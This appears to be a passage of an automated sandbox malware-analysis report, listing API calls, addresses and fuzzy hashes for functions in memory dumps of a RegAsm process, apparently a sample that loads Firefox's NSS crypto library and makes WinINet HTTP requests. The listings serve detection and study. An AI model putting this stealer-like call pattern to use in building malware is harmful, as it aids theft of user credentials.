                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2957673229-0
                                                                                                        • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                        • Instruction ID: 1e4ead622d26c57925889f036addc2ff31024c0e53020f1fbb18b4b917d62571
                                                                                                        • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                        • Instruction Fuzzy Hash: FC21CFB5E007469BE700CF25D944B52B7E8EFA5309F25821AAC1C87A61EB70E5D4C6D0
                                                                                                        Function 6C204900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C1EC79F,?,?,6C205C4A,?), ref: 6C204950
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208821
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C20883D
                                                                                                          • Part of subcall function 6C208800: EnterCriticalSection.KERNEL32(?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208856
                                                                                                          • Part of subcall function 6C208800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C208887
                                                                                                          • Part of subcall function 6C208800: PR_Unlock.NSS3(?,?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208899
                                                                                                        • TlsGetValue.KERNEL32(?,?,?), ref: 6C20496A
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C20497A
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C204989
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3904631464-0
                                                                                                        • Opcode ID: 943df6e53a86edbd94b5be45b9c62ef05cdbc9b7fd1cc141b5697f56f8cbde9c
                                                                                                        • Instruction ID: fdd11a747f9ca8ff175f5e87b905504b07f41a63c42661e254c5e145dbbef0f3
                                                                                                        • Opcode Fuzzy Hash: 943df6e53a86edbd94b5be45b9c62ef05cdbc9b7fd1cc141b5697f56f8cbde9c
                                                                                                        • Instruction Fuzzy Hash: 551126B6B0060D9FEB009F28DD42A1673BCFB1632DF144137ED4A87E11EB22E8148791
                                                                                                        Function 6C2208D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C2209B3,0000001A,?), ref: 6C2208E9
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C2208FD
                                                                                                          • Part of subcall function 6C20FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C208D2D,?,00000000,?), ref: 6C20FB85
                                                                                                          • Part of subcall function 6C20FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C20FBB1
                                                                                                        • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C220939
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C220953
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2572351645-0
                                                                                                        • Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                        • Instruction ID: 88fd03686d3f2b9a4a9a5064544c468ea9e2a4e42168b8c03d1fd07579f1df40
                                                                                                        • Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                        • Instruction Fuzzy Hash: 490100B1A0174F2BFB04DB369C20F6737999F40619F004039FC1BC6A01FB25E418DA94
                                                                                                        Function 6C23EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EDD4
                                                                                                        • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EDFD
                                                                                                        • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EE14
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • memcpy.VCRUNTIME140(?,?,6C229767,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EE33
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3903481028-0
                                                                                                        • Opcode ID: 09651d523c9247505a8e8f74e9a72560a0f45c7a551a9f6010e5350354c9693b
                                                                                                        • Instruction ID: 323210463dbaeefe443faafa1ce1afff6edec7272dfc5967b17f270a05061da8
                                                                                                        • Opcode Fuzzy Hash: 09651d523c9247505a8e8f74e9a72560a0f45c7a551a9f6010e5350354c9693b
                                                                                                        • Instruction Fuzzy Hash: 8B1198F560071E6BD7109E65DC84B06B358EF0435DF104535ED1D82A40E330E868C7E1
                                                                                                        Function 6C1D8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 284873373-0
                                                                                                        • Opcode ID: 90bc85cfc6442cf4e1dace5760eb41e788f01913fc2d038a4be86ec397e74634
                                                                                                        • Instruction ID: 71caf17d7997b375f9b24acfc1b717665014203641a18f12149db20479e432fa
                                                                                                        • Opcode Fuzzy Hash: 90bc85cfc6442cf4e1dace5760eb41e788f01913fc2d038a4be86ec397e74634
                                                                                                        • Instruction Fuzzy Hash: A1118C75605A059FD700AF78D4882AABBF4FF05714F02496ADC88D7B00E730E8A4CBD2
                                                                                                        Function 6C25AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C245F17,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25AC94
                                                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C245F17,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25ACA6
                                                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25ACC0
                                                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25ACDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989322779-0
                                                                                                        • Opcode ID: ac2a84d76c8784569d9e8a5648ee858e9a3c8f9fb3b8b4af1568b0f1fcbbf95d
                                                                                                        • Instruction ID: 282de213566e2211bf08b6fee1f066778f371f6e1858fdbc2416e6b1d8dd19b3
                                                                                                        • Opcode Fuzzy Hash: ac2a84d76c8784569d9e8a5648ee858e9a3c8f9fb3b8b4af1568b0f1fcbbf95d
                                                                                                        • Instruction Fuzzy Hash: F9015EB5701B069BE750DF29E90A753B7E8FF0066AB504839E85AC3E10E731F065CBA1
                                                                                                        Function 6C2088E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,?,?,6C2108AA,?), ref: 6C2088F6
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C2108AA,?), ref: 6C20890B
                                                                                                        • PR_NotifyCondVar.NSS3(?,?,?,?,?,6C2108AA,?), ref: 6C208936
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C2108AA,?), ref: 6C208940
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 959714679-0
                                                                                                        • Opcode ID: 01803144d86e68a8a72c96bb1035cde3ff0653f52b0952a87c281339a1f02998
                                                                                                        • Instruction ID: 5b4565038355a7b3fc22beb18baa6166fa73de9d609770843a02c0d09d4caf4b
                                                                                                        • Opcode Fuzzy Hash: 01803144d86e68a8a72c96bb1035cde3ff0653f52b0952a87c281339a1f02998
                                                                                                        • Instruction Fuzzy Hash: 5F010C75605A0A9FD700FF79D08465AB7B4FB05259F05462AEC8487B00E730E5A5CBD2
                                                                                                        Function 6C240840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_CallOnce.NSS3(6C312F88,6C240660,00000020,00000000,?,?,6C242C3D,?,00000000,00000000,?,6C242A28,00000060,00000001), ref: 6C240860
                                                                                                          • Part of subcall function 6C134C70: TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                          • Part of subcall function 6C134C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                          • Part of subcall function 6C134C70: PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C242C3D,?,00000000,00000000,?,6C242A28,00000060,00000001), ref: 6C240874
                                                                                                        • EnterCriticalSection.KERNEL32(00000001), ref: 6C240884
                                                                                                        • PR_Unlock.NSS3 ref: 6C2408A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                        • String ID:
                                                                                                        • API String ID: 2502187247-0
                                                                                                        • Opcode ID: 607dbb7230f0536932f1e4589522ee3b44014baae8155fac683b77da211c545a
                                                                                                        • Instruction ID: 13110fc05a22c04b4d4ac832cbace5a231f3404f87df63c3ffbaba6fc0c65aba
                                                                                                        • Opcode Fuzzy Hash: 607dbb7230f0536932f1e4589522ee3b44014baae8155fac683b77da211c545a
                                                                                                        • Instruction Fuzzy Hash: 8B012B76A0024D6FEB046B69ED45A567B3CDB6731DF088565FC0852E02EB2394D4C7E1
                                                                                                        Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                        • wsprintfA.USER32 ref: 00410D16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1243822799-0
                                                                                                        • Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
                                                                                                        • Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
                                                                                                        • Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
                                                                                                        • Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775
                                                                                                        Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$CreateSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 4148174661-0
                                                                                                        • Opcode ID: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
                                                                                                        • Instruction ID: 87089636491fbed30b1748ff62e0772d8b8c37abbef2c6f1f22f5f972430845f
                                                                                                        • Opcode Fuzzy Hash: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
                                                                                                        • Instruction Fuzzy Hash: 29F0A731641314FBFB14D7A0DD09FDA7AADEB08761F200250FE01E61D0D7B06F818669
                                                                                                        Function 6C2CCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalDeleteSectionfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 2988086103-0
                                                                                                        • Opcode ID: e9db60b1299d2614684d02722c5addbc7972c8211e5701036d94d9c594820524
                                                                                                        • Instruction ID: d6241d24f2cd501f63c893e8a133685f64a9cd7e1cac7c7c418882c45e33ac58
                                                                                                        • Opcode Fuzzy Hash: e9db60b1299d2614684d02722c5addbc7972c8211e5701036d94d9c594820524
                                                                                                        • Instruction Fuzzy Hash: 99E030767006089BCA10EFA8DC4488677ACEE49270315052AE691C3740D331F905CBA1
                                                                                                        Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                          • Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                          • Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                          • Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                          • Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                          • Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                          • Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                          • Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                        • _memset.LIBCMT ref: 00412CDF
                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
